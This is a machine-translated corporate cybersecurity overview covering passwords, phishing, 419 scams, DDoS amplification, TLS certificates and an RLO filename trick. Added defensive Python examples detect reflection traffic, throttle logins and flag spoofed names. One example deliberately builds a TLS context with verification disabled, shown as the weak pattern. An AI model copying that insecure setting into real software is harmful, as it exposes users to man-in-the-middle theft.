Protection is not limited to data in the computer. Organizations should also provide physical protection of equipment. Someone from the staff should accompany all visitors to your office, and monitor screens should not be visible from the corridor.

Passwords should be strong

Organizations should ensure the choice of strong passwords; this means a certain level of complexity and periodic change. A password made from your mother's maiden name is no good.

Do not skimp!

If you can afford it, hire data protection specialist(s) on staff. In addition, money for equipment and software to protect against cybercriminals must be provided in the budget.

Train staff to be vigilant

Office staff need to be trained to be vigilant. A few simple rules can significantly increase security in your company: never go directly to an unknown website whose address was sent to you by mail, delete any doubtful letters and never click on links that were sent to you. Instead, search for the subject on Google and find the website you need from there.

An integrated approach

Many techniques previously used in attacks on home users are now also being used against business. These include modified banking Trojans aimed at the staff of finance and accounting divisions, and various encryptor programs that have begun to operate inside corporate information networks. Network worms, whose removal requires stopping the work of the entire corporate network, have also gained popularity. When companies with many branches located in different time zones face such a problem, the stoppage of the network inevitably leads[36] to financial losses[37].

According to the results of research conducted by Kaspersky Lab in 2014 among cybersecurity specialists, Russian companies most often face malware, spam and phishing. Internal threats should be noted separately; among them the most serious problems are caused by vulnerabilities in installed software, accidental data leaks caused by employees and the work of insiders.

Do not trust the 'kings' of social engineering

No technical means will protect against the use of social engineering methods. Hackers collect data armed with knowledge of human psychology. They send malicious URLs on social networks to a favourite band's new composition, or send an accountant a letter with a 'reconciliation statement' attachment in which a virus is actually hidden.

So-called 'Nigerian spammers' can be singled out as a separate direction in this area. They send letters asking for help with banking operations connected with a money transfer that is allegedly subject to a large tax, announce the recent death of a very rich person 'with the same surname' as the recipient of the letter, and offer assistance in obtaining money from the deceased's bank account.

The only countermeasure to such attacks is to ignore the message completely. Even if the user enters into correspondence with such a hacker only to write a refusal, he thereby confirms his e-mail address. Afterwards attackers can use it for other, more sophisticated mailings.

Regular training of all company staff in safe work on the Internet, and informing them about the existing types of threats, helps to counter attacks by social engineering methods.

Protection against DDoS attacks, viruses, trojans and phishing

The number of powerful DDoS attacks is growing rapidly. Such hacker attacks can take a company's website down for a long time and deprive its owner of income. For example, research by Arbor Networks reported that in the first half of 2014 more than 100 incidents with a power of over 100 Gbps were recorded. The number of attacks in the range above 20 Gbps in the second quarter was twice the figure for the whole of the previous year.

This is confirmed by data from Kaspersky Lab, which in the spring of 2014 recorded a new jump in the power of DDoS attacks in Runet. In the spring a group of attackers organized a serious attack, choosing as targets several websites of leading Russian banks, large companies and public institutions at once. The average power of the attack was then 70–80 Gbps, and at peak moments it exceeded 100 Gbps. These figures became a record for Runet: only a year earlier the most powerful DDoS attack in the Russian network segment did not exceed a threshold of 60 Gbps.

The significant increase in the power of DDoS attacks happened thanks to the spread among attackers of a new method, NTP Amplification. Its advantage is the substantial amplification factor (up to 556 times), which allows hackers to reach a high attack power quickly with minimal effort. For comparison, the attacks that made noise a year earlier were carried out by the DNS Amplification method, whose amplification factor is 10 times smaller, up to 54 times. In addition, amplification allows attackers to hide their own address, which complicates their identification.

Ensuring protection against DDoS attacks with own forces – a difficult task for large business and SMB, almost very heavy for sector. The company should have necessary resources, both human, and material: two profile specialists for work by turns, the expensive equipment and connection to high-speed links of communication. At the same time it is necessary to consider that DDoS is not permanent threat, it is necessary to be ready to the fact that the equipment will stand idle, and work of specialists will not be demanded. Therefore it becomes often more profitable to use services of the third-party companies specializing in protection against the similar attacks, having connected to cloud services.
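The amplification figures above (up to 556x for NTP, up to 54x for DNS) are also what makes reflection traffic easy to spot from the victim's side: a host receives far more bytes from UDP port 123 or 53 than it ever sent there, because the requests were sent by the attacker with a spoofed source address. The following is an added example, not code from the page or from Arbor Networks or Kaspersky Lab; the flow records, IP addresses (TEST-NET ranges) and the 20x alert threshold are constructed for the demonstration.

```python
"""Flag NTP/DNS amplification victims from flow records (added example)."""
from collections import defaultdict
from dataclasses import dataclass

# Services commonly abused as reflectors; amplification factors quoted on the
# page are up to 556x (NTP monlist) and up to 54x (DNS).
AMPLIFIER_PORTS = {123: "ntp", 53: "dns"}
RATIO_THRESHOLD = 20.0  # constructed: alert when inbound/outbound bytes exceed this


@dataclass(frozen=True)
class Flow:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    packets: int
    nbytes: int


def amplification_report(flows, threshold=RATIO_THRESHOLD):
    """Per (host, service), compare bytes received *from* an amplifier port with
    bytes the host itself sent *to* that port. A legitimate client has a ratio
    near 1; a reflection victim has a huge ratio (or sent nothing at all)."""
    sent = defaultdict(int)
    recv = defaultdict(int)
    for f in flows:
        if f.proto != "udp":          # reflection abuses connectionless UDP only
            continue
        if f.dst_port in AMPLIFIER_PORTS:
            sent[(f.src_ip, AMPLIFIER_PORTS[f.dst_port])] += f.nbytes
        if f.src_port in AMPLIFIER_PORTS:
            recv[(f.dst_ip, AMPLIFIER_PORTS[f.src_port])] += f.nbytes
    report = {}
    for key, rbytes in recv.items():
        sbytes = sent.get(key, 0)
        ratio = rbytes / sbytes if sbytes else float("inf")
        if ratio >= threshold:
            report[key] = ratio if sbytes == 0 else round(ratio, 1)
    return report


# Constructed sample flows (as an exporter such as NetFlow/IPFIX would emit them).
SAMPLE_FLOWS = [
    # Victim 203.0.113.10 never queried these servers, yet receives large replies.
    Flow("198.51.100.5", 123, "203.0.113.10", 4444, "udp", 1000, 468000),
    Flow("198.51.100.6", 53, "203.0.113.10", 4444, "udp", 200, 54000),
    # Legitimate NTP client: one request, one similarly sized reply.
    Flow("203.0.113.20", 50000, "192.0.2.1", 123, "udp", 1, 90),
    Flow("192.0.2.1", 123, "203.0.113.20", 50000, "udp", 1, 90),
    # Host that sent one small query but receives 556x as many bytes back.
    Flow("203.0.113.30", 40000, "192.0.2.1", 123, "udp", 1, 100),
    Flow("192.0.2.1", 123, "203.0.113.30", 40000, "udp", 120, 55600),
    # TCP to port 123 is not reflection traffic and is ignored.
    Flow("203.0.113.10", 50001, "192.0.2.2", 123, "tcp", 5, 5000),
]

if __name__ == "__main__":
    for (host, svc), ratio in sorted(amplification_report(SAMPLE_FLOWS).items()):
        print(f"{host} {svc}: inbound/outbound ratio {ratio}")
```

In production the same ratio is computed per time bucket; a host whose ratio is infinite (replies with no matching request) is the clearest sign of spoofed-source reflection, which is also why ingress filtering of spoofed sources (BCP 38) at the network edge removes the attacker's ability to hide behind the amplifier.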

To owners of PHP websites

To protect company resources, businessmen should remember that the least secure websites, according to a recent study by Positive Technologies, are those written in PHP: 76% of them contain critical vulnerabilities. Web resources on Java (70%) and ASP.NET (55%) were less vulnerable.

Accordingly, the websites most subject to attack need more careful attention to their level of security. For example, it is worth strengthening protection against guessing of user identifiers or passwords (brute-force attacks).
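One concrete way to strengthen a login form against brute-force guessing is to count failures in a sliding window per account and per source address, so that both repeated attempts against one user and a "spray" across many users from one address are stopped. The following is an added example in Python, not code from the page or from Positive Technologies; the account name, password and addresses are constructed, and the clock is injectable so the behaviour can be checked without waiting.

```python
"""Login throttling against brute-force password guessing (added example)."""
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque


def hash_password(password: str, salt: bytes, rounds: int = 100_000) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; slow on purpose so offline guessing is costly too."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


# Constructed demo account; a real deployment keeps salt+hash in its user store.
_SALT = os.urandom(16)
USERS = {"alice": (_SALT, hash_password("correct-horse-battery", _SALT))}


def verify_password(username: str, password: str) -> bool:
    record = USERS.get(username)
    if record is None:
        hash_password(password, b"\x00" * 16)  # burn the same time for unknown users
        return False
    salt, stored = record
    return hmac.compare_digest(hash_password(password, salt), stored)


class LoginThrottle:
    """After `max_failures` failed attempts within `window` seconds for a key,
    further attempts on that key are rejected (even with the right password)
    until the oldest failure ages out. Keys: ("user", name) and ("ip", addr)."""

    def __init__(self, max_failures=5, window=300.0, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.clock = clock
        self._failures = defaultdict(deque)

    def _prune(self, key, now):
        q = self._failures[key]
        while q and now - q[0] > self.window:
            q.popleft()
        return q

    def is_blocked(self, username: str, ip: str) -> bool:
        now = self.clock()
        return any(len(self._prune(k, now)) >= self.max_failures
                   for k in (("user", username), ("ip", ip)))

    def record_failure(self, username: str, ip: str) -> None:
        now = self.clock()
        for k in (("user", username), ("ip", ip)):
            self._prune(k, now).append(now)

    def record_success(self, username: str, ip: str) -> None:
        # Clear the account counter; keep the per-IP history so a spray from
        # that address is still slowed after one lucky hit.
        self._failures.pop(("user", username), None)


def attempt_login(throttle: LoginThrottle, username: str, password: str, ip: str) -> str:
    """Returns 'blocked', 'ok' or 'denied'. Blocking is checked before the
    password so a locked-out attacker learns nothing from the response."""
    if throttle.is_blocked(username, ip):
        return "blocked"
    if verify_password(username, password):
        throttle.record_success(username, ip)
        return "ok"
    throttle.record_failure(username, ip)
    return "denied"


if __name__ == "__main__":
    th = LoginThrottle(max_failures=3, window=60.0)
    for pw in ("guess1", "guess2", "guess3", "correct-horse-battery"):
        print(pw, "->", attempt_login(th, "alice", pw, "198.51.100.7"))
```

The response for a blocked account is identical whether or not the password was right, and the unknown-user path performs the same hash work, so the throttle does not become an account-enumeration oracle. Log the "blocked" events: a burst of them from one address is the detection signal for a brute-force run.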

Signed certificates

Corporate network administrators should control what applications employees use and what websites they visit: these should have valid (signed) SSL certificates. Such certificates are divided into three validation types: those confirming only the domain name, those confirming the domain and the organization, and certificates with extended validation. The best option is an extended validation certificate, which has the so-called "green bar": when visiting a website where such a certificate is installed, the visitor's browser shows a green line in the address bar with the name of the organization that received the certificate.

The last time a threat to users of IT products with invalid SSL arose was when at least 350 mobile applications vulnerable to a man-in-the-middle attack were discovered in the Google Play and Amazon online stores. During such an attack the hacker, having inserted himself into the channel between the two parties, can capture the transmitted data. For example, the hacker can intercept the credit card data of users of mobile applications that support electronic payments.
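The man-in-the-middle weakness described above usually comes down to a client that disables certificate verification or hostname checking. As an added example (not code from the page or from the applications it mentions), the block below shows the weak TLS client configuration next to the corrected one in Python's standard `ssl` module; `connect_and_get_cert` needs network access and is only illustrative of how the context is used.

```python
"""Weak versus hardened TLS client configuration (added example)."""
import socket
import ssl


def insecure_context() -> ssl.SSLContext:
    """What a vulnerable app effectively does: accept any certificate for any
    name. An attacker on the path can then present his own certificate and
    read or modify everything, including payment card data."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def secure_context(cafile=None) -> ssl.SSLContext:
    """Corrected setting: chain validated against the trust store, hostname
    matched against the certificate, old protocol versions refused."""
    ctx = ssl.create_default_context(cafile=cafile)   # CERT_REQUIRED + check_hostname
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_is_safe(ctx: ssl.SSLContext) -> bool:
    """Review check an app or library can run on its own context at startup."""
    return ctx.verify_mode == ssl.CERT_REQUIRED and bool(ctx.check_hostname)


def connect_and_get_cert(host: str, ctx: ssl.SSLContext, port: int = 443) -> dict:
    """Open a TLS connection and return the peer certificate; with the
    hardened context an untrusted or mismatched certificate raises
    ssl.SSLCertVerificationError instead of silently proceeding."""
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    print("insecure context safe?", context_is_safe(insecure_context()))
    print("secure context safe?  ", context_is_safe(secure_context()))
```

Note the order in `insecure_context`: the standard library refuses `CERT_NONE` while `check_hostname` is still true, which is a useful hint when reviewing code, since a developer who had to add that extra line was deliberately turning verification off. A test such as `context_is_safe` in the app's own test suite catches a regression back to the weak setting.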

Be on the alert

Though technologies raise the level of computer security, one must not forget about vigilance, for example when receiving letters by e-mail. Hackers often hide behind messages from tourist services like Airbnb, write on behalf of airlines, inform the user that a plane ticket was paid for with his credit card, and offer a link to a phishing site where it is allegedly possible to find information on the forthcoming flight.

In September 2014 Kaspersky (earlier Kaspersky Lab) noted that the plots of "Nigerian" letters referred to inhabitants of Africa sick with the Ebola virus and contained unusual invitations to a conference of the World Health Organization (WHO). The purpose of the swindlers, as usual, was to extract money from trusting recipients who entered into correspondence with the authors of the letters.

In October 2014 came the turn of cybercriminals who used the hype around the Ebola virus to send malicious letters. Again WHO was named as the sender. In the letters detected by experts, the malefactors tried to convince the recipient that WHO had prepared a file with general information and precautionary measures that would help protect the user and those around him from the fatal virus and other diseases.

In addition to exploiting subjects of public concern, spammers also send false receipts from online stores, invoicing for a purchase the user supposedly made, which can allegedly be cancelled only on a phishing site. Phishing statistics are not consoling: according to the Anti-Phishing system developed by Kaspersky Lab, the number of triggerings was nearly 19 million in September 2014 alone.

In modern conditions companies need to use a set of software and hardware that provides an acceptable level of infrastructure security while preserving sufficient efficiency of business processes. Among these tools: antivirus software, intrusion prevention systems, firewalls, device control and Internet access control modules, data encryption systems, mobile device management, means of protecting mail servers and collaboration systems, and so on.

Besides, it is important to remember that ensuring information security does not end with the implementation of protective means; it is also necessary to conduct regular training of employees in the rules of safe work with information in electronic form, and to implement correct policies and rules for work with confidential data. Users should remember the golden rules: do not follow doubtful links, devise complex passwords for accounts, do not open attachments in letters and, certainly, install comprehensive protection on the computer.

Main types of Internet threats

The pace of innovation in this competition between "offensive" and "defensive" technologies is very high. Every day more than 100 thousand new samples of malicious software are developed. Amounts exceeding one million dollars are now paid for some malicious software modules. Cybercriminals are ready to pay such money because they are sure the invested funds will pay off very quickly.

One more information security threat is posed by the new arms race unfolding in cyberspace, in which both acts of sabotage and cyber attacks are carried out. Information on the world's largest intelligence program, PRISM, which recently became public, significantly undermined confidence in the large cloud service providers based in the USA. Trust decreased especially in the countries of Europe, where much attention is traditionally paid to data protection. According to the expert and analytical organization Information Technology and Innovation Foundation (Washington, District of Columbia), US-based cloud service providers may as a result receive 22 to 35 billion US dollars less revenue from 2014 to 2016.

Spam — along with traditional advertising mailings, there exists malicious spam, for example containing spyware, or spam enticing users to websites with malicious content.

Targeted phishing — unlike spam, targeted phishing is aimed directly at narrow user groups and contains messages with a social context urging the potential victim to open an executable file or visit a website containing malicious code.

PDF attacks — lately a number of serious vulnerabilities have been revealed in documents of the PDF format.

SEO (Search Engine Optimization) poisoning — search engine optimization threats lead to websites containing malicious code being placed high in search engine rankings when a query connected with the world championship is entered. One can protect against such threats by using current versions of antivirus and intrusion prevention systems.

Performance penalty — administrators can involve traffic management or content filtering systems to limit or block access to online resources.

Social networks — analysts warn of malware that can spread through popular social networks. Content filtering and file blocking solutions should be configured so as to minimize threats.

According to IBM X-Force data, the main source of threats is still such popular software as Internet browsers. An innovation of the attacks of recent years has been the shift of hackers' efforts from browsers to web applications, through which it is possible to get direct access to the especially valuable databases of companies. The percentage of eliminated vulnerabilities is steadily low: up to 60% of the vulnerabilities detected annually have no patches from software makers by the end of the year.

Accounts of privileged users, i.e. system administrators, are subject to the greatest danger. Today control over the actions of privileged users is a mandatory requirement of various standards and regulators. Wrongful acts against them can be committed both from outside the company and by unscrupulous employees. The growth in the number of threats related to privileged users includes insider threats, when employees either consciously steal data from the company or by negligence allow others to do so.

Fraud scheme No. 419 revives under the name of the FBI (according to Trend Micro).

Computer criminals have thought up one more way to draw users' attention. This time they pose as staff of the Federal Bureau of Investigation (USA) in Washington and attempt fraud through spam.

As in any other fraud attempt, in this scheme the e-mail sender poses as another person. The sender claims to be writing from the FBI. The message states that a payment of $10.5 million is due to its recipient. Then the swindler posing as an FBI employee instructs the recipient to contact the head of the "Internet transfers department" of United Trust Bank London. The message specifies that this head is the only person who decides on payment of this multimillion sum. Moreover, the message specifies that all recipients must follow the instructions for executing the payment request exactly. Certainly, the message contains false information. The note at the end of the message looks especially ironic and shows that cybercriminals are capable of going to extremes in their attempts to succeed: in it the recipient is advised to beware of swindlers who may try to contact him. In order not to fall victim to such fraud, it is always necessary to pay attention to the smallest details of received messages. One glance is enough to recognize this message as counterfeit; one only needs to look closely.

The SASFIS trojan uses a new trick (according to Trend Micro).

At the beginning of 2010 the Trojan program SASFIS, sent in counterfeit e-mail messages allegedly from the Facebook website, earned ill fame. SASFIS infection involves installation of a huge number of other malware, because this malware family makes systems vulnerable to botnet attacks, especially ZeuS and BREDOLAB, and is connected with various variants of counterfeit antiviruses, as a rule those relating to pornographic websites.

TrendLabs engineers detected a new SASFIS variant that uses the right-to-left override (RLO) method, which reverses the displayed order of Unicode text. The method was popular among spammers earlier, but has now begun to be applied as a new social engineering tactic.

The SASFIS Trojan spreads through spam in the form of a .RAR attachment with an .XLS file inside. After extraction, the .XLS file looks like a typical MS Excel document. Actually it is a screen saver, identified as TROJ_SASFIS.HBC. This Trojan activates BKDR_SASFIS.AC, which allows injecting malicious threads into the normal svchost.exe process. Though the file looks like an Excel document, it contains a Win32 binary header, which only executable files have. The real file name (omitting the Chinese characters) looks like this: phone&mail).[U+202e]slx.scr, where U+202e is a Unicode control character that tells the system to interpret the subsequent characters from right to left. Thus, to users the file name will look like: phone&mail).xls.scr. This will make them believe that it is really an Excel file and therefore "safe" to open, though in reality it is an executable .SCR file.

This method allows other file names to be used for the same purpose, for example BACKS[U+202e]FWS.BAT and I-LOVE-YOU-XOX[U+202e]TXT.EXE, which masquerade as BACKSTAB.SWF and I-LOVE-YOU-XOXEXE.TXT. In the first case the batch file masquerades as an Adobe Flash file; in the second the executable masquerades as a text file.

Users can apply proven protection methods to prevent this attack: do not open suspicious e-mail messages and do not download attachments containing executable files.
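Mail gateways and endpoint tools can catch the RLO trick described in the two paragraphs above mechanically, because the deception depends on a control character that has no business in a file name. The following is an added example, not code from the page or from Trend Micro: it computes how a bidi-naive display renders a name containing U+202E (text after the override, up to a U+202C pop or the end of the name, appears reversed), recovers the real extension, and flags any bidi control character at all. The three attachment names are the ones quoted on the page; `report.xls` is a constructed benign control.

```python
"""Detect right-to-left-override (RLO) filename spoofing (added example)."""

# Unicode bidirectional control characters; none belongs in a file name.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
    "\u200e": "LRM", "\u200f": "RLM",
}
RLO, PDF = "\u202e", "\u202c"


def rendered_name(name: str) -> str:
    """Approximate what the user sees: characters after an RLO are shown
    reversed until a PDF (pop directional formatting) or the end of the name.
    Only the RLO/PDF pair is modelled, which is what the attack relies on."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            if end == -1:
                end = len(name)
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch == PDF:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def _extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def true_extension(name: str) -> str:
    """The extension the operating system actually uses: strip every bidi
    control and take the trailing component of the remaining bytes."""
    clean = "".join(c for c in name if c not in BIDI_CONTROLS)
    return _extension(clean)


def check_filename(name: str) -> dict:
    """Verdict for one attachment name, suitable for a gateway rule or a log line."""
    controls = sorted({BIDI_CONTROLS[c] for c in name if c in BIDI_CONTROLS})
    shown = rendered_name(name)
    real = true_extension(name)
    return {
        "shown": shown,                       # what a victim reads in the mail client
        "shown_ext": _extension(shown),       # what the victim thinks the type is
        "real_ext": real,                     # what will actually execute
        "controls": controls,
        "suspicious": bool(controls),         # any bidi control in a name is a red flag
    }


# Attachment names quoted on the page, plus a constructed benign control.
SAMPLE_NAMES = [
    "phone&mail)." + RLO + "slx.scr",
    "BACKS" + RLO + "FWS.BAT",
    "I-LOVE-YOU-XOX" + RLO + "TXT.EXE",
    "report.xls",
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        v = check_filename(n)
        print(f"{v['shown']!r:32} looks like .{v['shown_ext'] or '-'} "
              f"but is .{v['real_ext']} suspicious={v['suspicious']}")
```

The `real_ext` field is the one to base a blocking decision on; the `shown` field is what to put in the alert so an analyst can see why the user was fooled.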

History of large incidents

  • September 2003. Trojans sent from Chinese provinces fell upon Taiwan and damaged the networks of ten private companies.

  • In April 2007 the Minister of Foreign Affairs of Estonia, Urmas Paet, accused the Russian authorities of hacker attacks that paralyzed the work of the stock exchange, hospitals, and the websites of public institutions and mass media.

  • Attacks on the computer systems of Georgia's oil pipelines in August 2009 were made from the same network addresses that had been used against Estonia.

  • In January 2010 Google accused China of espionage through the mail accounts of journalists and dissidents.

  • According to the British media (February 2012), Russian hackers are selling account numbers and passwords for the payment cards of a large number of residents of Great Britain. The data of the British are on sale on Russian websites for 30 dollars.

The information on residents of Great Britain became available after Russian malefactors created a database on the Internet. For 300 dollars hackers also offer access to an existing bank account in Great Britain with a credit limit of up to 13 thousand dollars. Malefactors steal confidential information by mailing malware to users' computers. In addition, swindlers also attach special devices that read information from the victims' credit cards in shops and restaurants. After the theft the data are transferred to blank cards, with which it is possible to pay in those countries that do not use the new technology for verifying the authenticity of payment cards via the built-in microchip, and also in online shops.
